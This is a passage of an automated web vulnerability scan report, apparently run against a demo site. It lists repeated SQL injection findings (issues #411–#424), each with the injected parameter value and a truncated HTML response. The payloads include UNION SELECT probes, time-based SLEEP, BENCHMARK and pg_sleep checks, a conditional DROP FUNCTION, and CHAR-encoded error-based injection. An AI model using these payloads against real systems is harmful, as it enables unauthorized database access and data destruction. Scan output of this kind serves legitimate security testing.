src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #411\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io' or '' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #412\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #413\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #414\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #415\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #416Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #417\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #418\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=y--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #419\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #420\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #421\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #422\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io IF(7423=7424) SELECT 7423 ELSE DROP \nFUNCTION xcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #423\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \")) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #424\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io%00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 